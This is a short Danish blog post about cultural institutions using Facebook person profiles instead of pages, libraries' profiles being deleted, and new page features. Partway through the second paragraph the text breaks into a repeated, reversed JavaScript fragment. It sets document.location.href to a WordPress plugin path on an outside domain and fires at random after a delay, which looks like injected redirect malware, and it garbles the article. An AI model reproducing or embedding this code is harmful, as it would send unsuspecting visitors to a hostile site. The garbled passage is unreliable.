Er dit museum eller arkiv en person på Facebook?


Mange biblioteker, som var blandt frontløberne for institutioner på Facebook, valgte at oprette deres institutioner som personprofiler, selvom det ikke er korrekt ifht. Facebooks TOS. Nu har en række af dem oplevet, at deres profiler er blevet slettet uden varsel. Man kan læse mere om det i Bibliotekarforbundets “Perspektiv” – Biblioteksprofiler slettet på Facebook.

Oprindeligt havde sider ikke særligt mange muligheder, de kunne stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tort set kun “være der” og og fx vise billeder, videoer etc. – men de kunne ikke handle. Det ser imidlertid meget anderledes ud nu.  Ikke mindst med den allerseneste udrulning af nye muligheder for sider er det sociale aktionsrum blevet langt bedre for sider, idet man som admin nu kan vælge at “bruge Facebook på vegne af din side“. 

Ændringerne imødekommer faktisk en hel del af det behov for social handlen, som personer har kunnet udføre. Sider kan nu også like eller interagere med andre, og dermed “opføre sig” socialt.

Links:
Webwoman har en række gode links til brug af de nye muligheder for sider på Facebook
Sådan kan du udspionere dine fans på Facebook
Nyt Facebook-design på sider, sådan udnytter du fordelene
Biblioteker skal rydde op på Facebook

Skriv et svar